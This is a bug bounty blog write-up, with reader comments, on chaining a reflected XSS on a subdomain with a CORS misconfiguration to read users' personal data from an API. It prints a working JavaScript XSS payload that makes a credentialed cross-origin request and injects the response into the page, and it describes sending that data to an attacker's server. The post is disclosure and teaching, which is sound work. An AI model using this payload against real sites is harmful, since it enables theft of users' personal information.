Exploiting CORS Misconfiguration using XSS
Hello All,
This Post is about how i exploited a Cross Origin Resource Sharing (CORS) Misconfiguration with the help of Cross Site Scripting (XSS)
After reporting some bugs to Netgear Kudos program I started getting old private program invites on Bugcrowd
One of which was with 300+ researchers and running from 2015
I wasn't happy about that, As i thought
But then Osama said this
So I finally started looking at it and trying my best to find something, Got one P3 but it went duplicate :(
But then I got an endpoint that was having simple CORS misconfiguration and the endpoint was giving user details like email address, age, gender, DOB, etc in response
After talking to a lot of people including James Kettle, Daniel Bakker and Kaushal parikh
I was finally able to understand how the attack flow will be like
1. The attacker Send the XSS link to user with following Payload
2. This will send a GET request to site.com with origin as sub.site.com and then paste the response back to paragraph tag (in this case)
3. And Send the data to Attacker's Server using JavaScript
I quickly reproduce it twice just to be sure and submitted the Report
The Bugcrowd Analyst replied this
So after sharing few messages,I was able to convince him and it was triaged and paid, The client replied this ^_^
Lessons Learned :
While i can't share the original poc, But i have tried to re-create the same scenario on my local machine
you can get the code from my profile on Github.
Thanks for reading Hopefully we will meet next time with another cool finding :)
--
Regards,
Noman Shaikh
This Post is about how i exploited a Cross Origin Resource Sharing (CORS) Misconfiguration with the help of Cross Site Scripting (XSS)
After reporting some bugs to Netgear Kudos program I started getting old private program invites on Bugcrowd
One of which was with 300+ researchers and running from 2015
I wasn't happy about that, As i thought
- I won't be able to find any thing as the program is running from such a long time and so many others have looked at it before me.
- Even if i will get something the chances of that being duplicate is high.
So I finally started looking at it and trying my best to find something, Got one P3 but it went duplicate :(
But then I got an endpoint that was having simple CORS misconfiguration and the endpoint was giving user details like email address, age, gender, DOB, etc in response
It was triaged, paid and fix within a week
I was happy and was planing to move on to other programs, Sadly none of them were as interesting as this one was.
So started looking back at it again, During my initial recon phase i had found a reflected xss on their support portal But that subdomain was out of scope of the program.
I don't know why but i just bookmarked it ¯\_(ツ)_/¯
Latter I found another endpoint that was also giving user details in response, But it was only accepting sub domain's as origin
So in this case there are two options :
- Finding XSS on a Subdomain ( that I already had )
- Subdomain Takeover
Even after Reading these blogs multiple times, I wasn't able to understand the flow of the attack
After talking to a lot of people including James Kettle, Daniel Bakker and Kaushal parikh
I was finally able to understand how the attack flow will be like
1. The attacker Send the XSS link to user with following Payload
<p id=demo></p></script><script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
alert(this.responseText);
document.getElementById("demo").innerHTML = this.responseText;
}
};
xhttp.open("GET", "https://sub.site.com/api/v2/config", true);
xhttp.withCredentials = true;
xhttp.send();
}
cors();
</script>2. This will send a GET request to site.com with origin as sub.site.com and then paste the response back to paragraph tag (in this case)
3. And Send the data to Attacker's Server using JavaScript
I quickly reproduce it twice just to be sure and submitted the Report
The Bugcrowd Analyst replied this
So after sharing few messages,I was able to convince him and it was triaged and paid, The client replied this ^_^
Lessons Learned :
- Just because the program is old and so many people have looked at it, It doesn't mean there is nothing to find.
- XSS is lub <3
While i can't share the original poc, But i have tried to re-create the same scenario on my local machine
you can get the code from my profile on Github.
Thanks for reading Hopefully we will meet next time with another cool finding :)
--
Regards,
Noman Shaikh
Nice find sir. 😄
ReplyDeleteThanks Sir :D
DeleteIf my understanding is correct,You are displaying sensitive data from main site to subdomain site < P > tag. Just displaying sensitive data in subdomain site is issue?
ReplyDeleteHow it can be exploited real time scenario.?
Just doing that is not an issue
DeleteBut, as we can get sensitive data from main domain to a subdomain and we have xss on that subdomain that is we can run JavaScript in the context of that site
and using JavaScript we can send the data to any server instead of displaying that.
Got it .Thanks!
DeleteSahi hai! Nice find!
ReplyDeleteGreat finding bro, keep it up!
ReplyDeleteThanks ;)
DeleteSir please provide me CORS payload
ReplyDelete